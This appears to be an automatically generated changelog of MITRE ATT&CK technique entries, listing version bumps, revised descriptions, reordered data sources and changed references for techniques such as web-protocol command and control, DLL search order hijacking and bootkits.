external_references[6]['url']https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
x_mitre_data_sources[0]Process: Process CreationModule: Module Load
x_mitre_data_sources[1]Module: Module LoadCommand: Command Execution
x_mitre_data_sources[2]Script: Script ExecutionProcess: Process Creation
x_mitre_data_sources[3]Command: Command ExecutionScript: Script Execution
x_mitre_version1.31.4

[T1071.001] Application Layer Protocol: Web Protocols

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may communicate using application layer protocolt1Adversaries may communicate using application layer protocol
>s associated with web traffic to avoid detection/network fil>s associated with web traffic to avoid detection/network fil
>tering by blending in with existing traffic. Commands to the>tering by blending in with existing traffic. Commands to the
> remote system, and often the results of those commands, wil> remote system, and often the results of those commands, wil
>l be embedded within the protocol traffic between the client>l be embedded within the protocol traffic between the client
> and server.   Protocols such as HTTP and HTTPS that carry w> and server.   Protocols such as HTTP/S(Citation: CrowdStrik
>eb traffic may be very common in environments. HTTP/S packet>e Putter Panda) and WebSocket(Citation: Brazking-Websockets)
>s have many fields and headers in which data can be conceale> that carry web traffic may be very common in environments. 
>d. An adversary may abuse these protocols to communicate wit>HTTP/S packets have many fields and headers in which data ca
>h systems under their control within a victim network while >n be concealed. An adversary may abuse these protocols to co
>also mimicking normal, expected traffic. >mmunicate with systems under their control within a victim n
 >etwork while also mimicking normal, expected traffic. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['TruKno']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 20:15:35.821000+00:002023-04-11 15:21:27.965000+00:00
descriptionAdversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
external_references[1]['source_name']University of Birmingham C2CrowdStrike Putter Panda
external_references[1]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
external_references[1]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttp://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'University of Birmingham C2', 'description': 'Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', 'url': 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'}
external_references{'source_name': 'Brazking-Websockets', 'description': 'Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.', 'url': 'https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/'}

[T1584.006] Compromise Infrastructure: Web Services

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may compromise access to third-party web servicet1Adversaries may compromise access to third-party web service
>s that can be used during targeting. A variety of popular we>s that can be used during targeting. A variety of popular we
>bsites exist for legitimate users to register for web-based >bsites exist for legitimate users to register for web-based 
>services, such as GitHub, Twitter, Dropbox, Google, etc. Adv>services, such as GitHub, Twitter, Dropbox, Google, SendGrid
>ersaries may try to take ownership of a legitimate user's ac>, etc. Adversaries may try to take ownership of a legitimate
>cess to a web service and use that web service as infrastruc> user's access to a web service and use that web service as 
>ture in support of cyber operations. Such web services can b>infrastructure in support of cyber operations. Such web serv
>e abused during later stages of the adversary lifecycle, suc>ices can be abused during later stages of the adversary life
>h as during Command and Control ([Web Service](https://attac>cycle, such as during Command and Control ([Web Service](htt
>k.mitre.org/techniques/T1102)) or [Exfiltration Over Web Ser>ps://attack.mitre.org/techniques/T1102)), [Exfiltration Over
>vice](https://attack.mitre.org/techniques/T1567).(Citation: > Web Service](https://attack.mitre.org/techniques/T1567), or
>Recorded Future Turla Infra 2020) Using common services, suc> [Phishing](https://attack.mitre.org/techniques/T1566).(Cita
>h as those offered by Google or Twitter, makes it easier for>tion: Recorded Future Turla Infra 2020) Using common service
> adversaries to hide in expected noise. By utilizing a web s>s, such as those offered by Google or Twitter, makes it easi
>ervice, particularly when access is stolen from legitimate u>er for adversaries to hide in expected noise. By utilizing a
>sers, adversaries can make it difficult to physically tie ba> web service, particularly when access is stolen from legiti
>ck operations to them.>mate users, adversaries can make it difficult to physically 
 >tie back operations to them. Additionally, leveraging compro
 >mised web-based email services may allow adversaries to leve
 >rage the trust associated with legitimate domains.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Dor Edry, Microsoft']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:01:48.047000+00:002023-04-12 20:19:21.620000+00:00
descriptionAdversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.
x_mitre_version1.11.2

[T1583.006] Acquire Infrastructure: Web Services

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may register for web services that can be used dt1Adversaries may register for web services that can be used d
>uring targeting. A variety of popular websites exist for adv>uring targeting. A variety of popular websites exist for adv
>ersaries to register for a web-based service that can be abu>ersaries to register for a web-based service that can be abu
>sed during later stages of the adversary lifecycle, such as >sed during later stages of the adversary lifecycle, such as 
>during Command and Control ([Web Service](https://attack.mit>during Command and Control ([Web Service](https://attack.mit
>re.org/techniques/T1102)) or [Exfiltration Over Web Service]>re.org/techniques/T1102)), [Exfiltration Over Web Service](h
>(https://attack.mitre.org/techniques/T1567). Using common se>ttps://attack.mitre.org/techniques/T1567), or [Phishing](htt
>rvices, such as those offered by Google or Twitter, makes it>ps://attack.mitre.org/techniques/T1566). Using common servic
> easier for adversaries to hide in expected noise. By utiliz>es, such as those offered by Google or Twitter, makes it eas
>ing a web service, adversaries can make it difficult to phys>ier for adversaries to hide in expected noise. By utilizing 
>ically tie back operations to them.>a web service, adversaries can make it difficult to physical
 >ly tie back operations to them.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Dor Edry, Microsoft']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 15:45:01.956000+00:002023-04-12 20:19:07.916000+00:00
descriptionAdversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
x_mitre_version1.11.2

[T1222.001] File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-09-01 20:05:05.268000+00:002023-04-21 12:27:04.900000+00:00
external_references[3]['source_name']Microsoft DACL May 2018Microsoft Access Control Lists May 2018
external_references[3]['description']Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.
external_references[3]['url']https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aceshttps://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
external_references[4]['source_name']Microsoft Access Control Lists May 2018Microsoft DACL May 2018
external_references[4]['description']M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.
external_references[4]['url']https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-listshttps://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[3]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.11.2

[T1047] Windows Management Instrumentation

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:25:21.348000+00:002023-04-07 17:10:13.696000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.21.3

[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 17:01:37.760000+00:002023-04-21 12:32:38.796000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1543.003] Create or Modify System Process: Windows Service

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-30 20:17:33.824000+00:002023-04-21 12:30:35.872000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[1]Driver: Driver LoadProcess: Process Creation
x_mitre_data_sources[2]Service: Service ModificationService: Service Creation
x_mitre_data_sources[3]Windows Registry: Windows Registry Key CreationCommand: Command Execution
x_mitre_data_sources[5]Command: Command ExecutionWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]Process: Process CreationService: Service Modification
x_mitre_data_sources[7]Service: Service CreationDriver: Driver Load
x_mitre_version1.21.3
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/550.html', 'external_id': 'CAPEC-550'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/551.html', 'external_id': 'CAPEC-551'}
Patches

[T1134] Access Token Manipulation

Current version: 2.0

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-03 02:14:43.557000+00:002023-03-30 21:01:47.762000+00:00
x_mitre_data_sources[3]Process: Process CreationActive Directory: Active Directory Object Modification
x_mitre_data_sources[5]Active Directory: Active Directory Object ModificationProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/633.html', 'external_id': 'CAPEC-633'}

[T1547.014] Boot or Logon Autostart Execution: Active Setup

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-03-05 22:36:37.414000+00:002023-03-22 14:17:17.353000+00:00
external_references[1]['source_name']Klein Active Setup 2010SECURELIST Bright Star 2015
external_references[1]['description']Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.
external_references[1]['url']https://helgeklein.com/blog/2010/04/active-setup-explained/https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
external_references[2]['description']Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. Retrieved December 18, 2020.Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.
external_references[3]['source_name']Citizenlab Packrat 2015FireEye CFR Watering Hole 2012
external_references[3]['description']Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.
external_references[3]['url']https://citizenlab.ca/2015/12/packrat-report/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
external_references[4]['source_name']FireEye CFR Watering Hole 2012Klein Active Setup 2010
external_references[4]['description']Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.htmlhttps://helgeklein.com/blog/2010/04/active-setup-explained/
external_references[5]['source_name']SECURELIST Bright Star 2015paloalto Tropic Trooper 2016
external_references[5]['description']Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.
external_references[5]['url']https://securelist.com/whos-really-spreading-through-the-bright-star/68978/https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
external_references[6]['source_name']paloalto Tropic Trooper 2016TechNet Autoruns
external_references[6]['description']Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[6]['url']https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/https://technet.microsoft.com/en-us/sysinternals/bb963902
external_references[7]['source_name']TechNet AutorunsCitizenlab Packrat 2015
external_references[7]['description']Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.
external_references[7]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://citizenlab.ca/2015/12/packrat-report/
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[3]Windows Registry: Windows Registry Key CreationWindows Registry: Windows Registry Key Modification

[T1557] Adversary-in-the-Middle

Current version: 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 19:51:41.858000+00:002023-03-30 21:01:37.568000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/94.html', 'external_id': 'CAPEC-94'}
x_mitre_data_sourcesApplication Log: Application Log Content

[T1123] Audio Capture

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:42:10.235000+00:002023-03-30 21:01:36.503000+00:00
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/634.html', 'external_id': 'CAPEC-634'}

[T1027.001] Obfuscated Files or Information: Binary Padding

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesFoltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.
external_referencesIshimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-572
external_referencesCAPEC-655
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 13:53:02.135000+00:002023-03-30 21:01:53.857000+00:00
external_references[1]['source_name']capecESET OceanLotus
external_references[1]['url']https://capec.mitre.org/data/definitions/572.htmlhttps://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
external_references[2]['source_name']capecSecurelist Malware Tricks April 2017
external_references[2]['url']https://capec.mitre.org/data/definitions/655.htmlhttps://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/
external_references[3]['source_name']ESET OceanLotusVirusTotal FAQ
external_references[3]['description']Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.
external_references[3]['url']https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/https://www.virustotal.com/en/faq/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Securelist Malware Tricks April 2017', 'description': 'Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.', 'url': 'https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/'}
external_references{'source_name': 'VirusTotal FAQ', 'description': 'VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.', 'url': 'https://www.virustotal.com/en/faq/'}

[T1547] Boot or Logon Autostart Execution

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-18 22:21:27.840000+00:002023-03-30 21:01:42.099000+00:00
x_mitre_data_sources[0]Process: Process CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[1]Driver: Driver LoadFile: File Creation
x_mitre_data_sources[2]Windows Registry: Windows Registry Key CreationProcess: OS API Execution
x_mitre_data_sources[4]Module: Module LoadFile: File Modification
x_mitre_data_sources[5]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[6]Command: Command ExecutionDriver: Driver Load
x_mitre_data_sources[7]File: File CreationCommand: Command Execution
x_mitre_data_sources[8]File: File ModificationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[9]Process: OS API ExecutionModule: Module Load
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/564.html', 'external_id': 'CAPEC-564'}

[T1037] Boot or Logon Initialization Scripts

Current version: 2.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 19:04:02.610000+00:002023-03-30 21:01:38.295000+00:00
x_mitre_data_sources[0]Active Directory: Active Directory Object ModificationProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationFile: File Modification
x_mitre_data_sources[2]File: File CreationWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[3]Command: Command ExecutionActive Directory: Active Directory Object Modification
x_mitre_data_sources[4]File: File ModificationFile: File Creation
x_mitre_data_sources[5]Windows Registry: Windows Registry Key CreationCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/564.html', 'external_id': 'CAPEC-564'}

[T1542.003] Pre-OS Boot: Bootkit

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-552
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 19:47:14.338000+00:002023-03-30 21:01:47.417000+00:00
external_references[1]['source_name']capecMandiant M Trends 2016
external_references[1]['url']https://capec.mitre.org/data/definitions/552.htmlhttps://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
external_references[2]['source_name']Mandiant M Trends 2016Lau 2011
external_references[2]['description']Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.
external_references[2]['url']https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdfhttp://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Lau 2011', 'description': 'Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.', 'url': 'http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion'}

[T1546.001] Event Triggered Execution: Change Default File Association

Current version: 1.0

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:55:49.219000+00:002023-03-30 21:01:40.699000+00:00
x_mitre_data_sources[1]Process: Process CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/556.html', 'external_id': 'CAPEC-556'}

[T1552.001] Unsecured Credentials: Credentials In Files

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesCG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-639
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:32:32.803000+00:002023-03-30 21:01:44.951000+00:00
external_references[1]['source_name']capecCG 2014
external_references[1]['url']https://capec.mitre.org/data/definitions/639.htmlhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html
external_references[2]['source_name']CG 2014SRD GPP
external_references[2]['description']CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.
external_references[2]['url']http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.htmlhttp://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx
external_references[3]['source_name']SRD GPPUnit 42 Hildegard Malware
external_references[3]['description']Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
external_references[3]['url']http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspxhttps://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
external_references[4]['source_name']Unit 42 Hildegard MalwareUnit 42 Unsecured Docker Daemons
external_references[4]['description']Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.
external_references[4]['url']https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
external_references[5]['source_name']Unit 42 Unsecured Docker DaemonsSpecter Ops - Cloud Credential Storage
external_references[5]['description']Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.
external_references[5]['url']https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/https://posts.specterops.io/head-in-the-clouds-bd038bb69e48
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Specter Ops - Cloud Credential Storage', 'description': 'Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.', 'url': 'https://posts.specterops.io/head-in-the-clouds-bd038bb69e48'}

[T1574.001] Hijack Execution Flow: DLL Search Order Hijacking

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMicrosoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-471
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 18:37:03.748000+00:002023-03-30 21:01:51.098000+00:00
external_references[1]['source_name']capecMicrosoft Dynamic Link Library Search Order
external_references[1]['url']https://capec.mitre.org/data/definitions/471.htmlhttps://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN
external_references[2]['source_name']Microsoft Dynamic Link Library Search OrderFireEye Hijacking July 2010
external_references[2]['description']Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.
external_references[2]['url']https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDNhttps://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html
external_references[3]['source_name']FireEye Hijacking July 2010OWASP Binary Planting
external_references[3]['description']Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.htmlhttps://www.owasp.org/index.php/Binary_planting
external_references[4]['source_name']OWASP Binary PlantingFireEye fxsst June 2011
external_references[4]['description']OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.
external_references[4]['url']https://www.owasp.org/index.php/Binary_plantinghttps://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
external_references[5]['source_name']FireEye fxsst June 2011Microsoft Security Advisory 2269637
external_references[5]['description']Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2011/06/fxsst.htmlhttps://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
external_references[6]['source_name']Microsoft Security Advisory 2269637Microsoft Dynamic-Link Library Redirection
external_references[6]['description']Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.
external_references[6]['url']https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN
external_references[7]['source_name']Microsoft Dynamic-Link Library RedirectionMicrosoft Manifests
